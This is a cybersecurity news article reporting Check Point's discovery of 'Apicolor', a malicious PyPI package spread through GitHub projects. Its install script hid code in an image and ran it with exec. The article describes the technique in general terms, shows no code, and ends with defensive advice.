github-abused-to-distribute-malicious-packages-on-pypi-in-image-files

Share news article

Share on facebook
Share on twitter
Share on linkedin
Share on email

GitHub Abused to Distribute Malicious Packages on PyPI in Image Files

The Check Point CloudGuard Spectral Data Science team has detected a new malicious package on the Python Package Index (PyPI) repository capable of hiding code in images using a steganographic technique. The malicious package is infecting users via GitHub’s open-source projects.

The new alert came just days after Python developers were warned of malicious packages swapping out their crypto addresses.

Detailed Analysis

According to Check Point, the malicious package was found in the PyPI software repository for the Python programming language and is designed to hide code in images via Steganography, which refers to image code obfuscation.

GitHub Abused to Distribute Malicious Packages on PyPI in Image Files
The actual image used in the attack (Image: Check Point)

The campaign’s modus operandi involves infecting PyPI users through open-source projects revealing that attackers have launched this campaign with thorough planning. It also highlights that PyPI-related obfuscation techniques are continually evolving.

Malicious Package Details

Check Point’s blog post noted that the malicious package was named Apicolor. Initially, it appeared just like an in-development package on PyPI, but a deeper probe into its installation script revealed a “strange, non-trivial code section at the beginning,” the advisory read.

GitHub Abused to Distribute Malicious Packages on PyPI in Image Files
(Image: Check Point)

This code manually installed additional requirements and downloaded an image from the web. Then it used the newly installed package for image processing and triggering the processing generated output with the exec command.

An unsuspecting user will access these GitHub open-sourced projects when searching for legit projects on the web and installing them without knowing it fetches a malicious package import.

“It’s important to note that the code seems to work. In some cases, there are empty malicious packages.”

Check Point

It is worth noting that this malicious package differs from all previously discovered packages as it can camouflage its capabilities in different ways. Moreover, the way it targets PyPI users are targeted and infected with malicious GitHub imports.

Check Point urges users to use threat code scanners and double-check third-party packages before using them. It is also important to ensure GitHub’s ratings for a particular project aren’t synthetically created.

  1. GitHub: Hackers Stole OAuth Access Tokens
  2. GitHub Repositories Cloned in Supply Chain Attack
  3. Chinese Hackers Hiding Malware in Windows Logo
  4. Infected WAV files install malware, cryptominers on PCs
  5. Hackers spoof commit metadata, create false GitHub repositories

Author

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Related News

Hackers using USB drives to spread malware in ongoing attack

Hackers using USB drives to spread malware in ongoing attack

According to a recent post by the cybersecurity firm Mandiant, USB drives are being used to hack targets in Southeast…
AI-Powered Smart Glasses Give Deaf People the Power of Speech

AI-Powered Smart Glasses Give Deaf People the Power of Speech

In a recent example of innovative technology making a positive difference, there is now new artificial intelligence (AI) powered smart…
16,000+ Scam Domains Aimed at FIFA World Cup Fans in Qatar

16,000+ Scam Domains Aimed at FIFA World Cup Fans in Qatar

Seeing as scammers readily jump to capitalize on events with huge global interest, it comes as no surprise that Group-IB…